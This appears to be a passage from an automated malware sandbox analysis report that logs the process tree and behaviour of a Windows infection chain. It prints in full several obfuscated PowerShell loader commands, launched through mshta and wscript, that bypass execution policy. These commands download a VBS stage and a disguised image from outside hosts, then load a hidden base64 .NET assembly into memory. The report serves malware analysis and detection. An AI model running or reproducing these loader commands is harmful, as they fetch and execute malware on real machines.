AgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.mihrofgnimocsyad#aergh#iwsgnih##sebgnissik/77/7.321.542.271//:p##h';$restoredText = $originalText -replace '#', 't';$wheal = 'https://res.cloudinary.com/dmwnmemcm/image/upload/v1736770712/mq8ht5gredx4ck4rramp.jpg ';$nectars = New-Object System.Net.WebClient;$polyedrons = $nectars.DownloadData($wheal);$tropical = [System.Text.Encoding]::UTF8.GetString($polyedrons);$bubbas = '<<BASE64_START>>';$fairhood = '<<BASE64_END>>';$fulminatory = $tropical.IndexOf($bubbas);$quadriloge = $tropical.IndexOf($fairhood);$fulminatory -ge 0 -and $quadriloge -gt $fulminatory;$fulminatory += $bubbas.Length;$oxytrope = $quadriloge - $fulminatory;$moorcocks = $tropical.Substring($fulminatory, $oxytrope);$pelisse = -join ($moorcocks.ToCharArray() | ForEach-Object { $_ })[-1..-($moorcocks.Length)];$unreigned = [System.Convert]::FromBase64String($pelisse);$chevaux = [System.Reflection.Assembly]::Load($unreigned);$cutesily = [dnlib.IO.Home].GetMethod('VAI');$cutesily.Invoke($null, @($restoredText, 'pulvilliform', 'pulvilliform', 'pulvilliform', 'CasPol', 'pulvilliform', 'pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','pulvilliform','1','pulvilliform','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.cmdline"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BEEE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E74610 push edx; iretd 3_2_06E74AFA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E71F40 push edx; iretd 3_2_06E72162
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E742F3 push edx; iretd 3_2_06E742F6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E716F0 push edx; iretd 3_2_06E718C2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E73AF8 push edx; iretd 3_2_06E73C3E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E706C7 push edx; iretd 3_2_06E706CA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E73EC0 push edx; iretd 3_2_06E74042
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E70ACB push edx; iretd 3_2_06E70ACE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72EB0 push edx; iretd 3_2_06E72EB2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72AB8 push edx; iretd 3_2_06E72C42
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E73284 push edx; iretd 3_2_06E73286
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E70E80 push edx; iretd 3_2_06E70FBA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E71280 push edx; iretd 3_2_06E713DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72A9F pushad ; retf 3_2_06E72AB6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72660 push edx; iretd 3_2_06E7273E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E73678 push edx; iretd 3_2_06E737DA
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72644 push edx; iretd 3_2_06E72646
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E7365B push edx; iretd 3_2_06E7365E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E70258 push edx; iretd 3_2_06E7040E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E7422B push edx; iretd 3_2_06E7422E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E70237 push edx; iretd 3_2_06E7023A
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E743E0 push edx; iretd 3_2_06E744FE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E707EC push edx; iretd 3_2_06E707EE
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E713F8 push edx; iretd 3_2_06E71532
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E737F8 push edx; iretd 3_2_06E739A6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E743C3 push edx; iretd 3_2_06E743C6
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E74BD0 push edx; iretd 3_2_06E74BD2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E70FD8 push edx; iretd 3_2_06E7112E
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72FB0 push edx; iretd 3_2_06E73112
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E72F93 push edx; iretd 3_2_06E72F96
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06E71B73 push edx; iretd 3_2_06E71B76
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW,12_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00419DBA OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_00419DBA

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041BEEE LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041BEEE
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
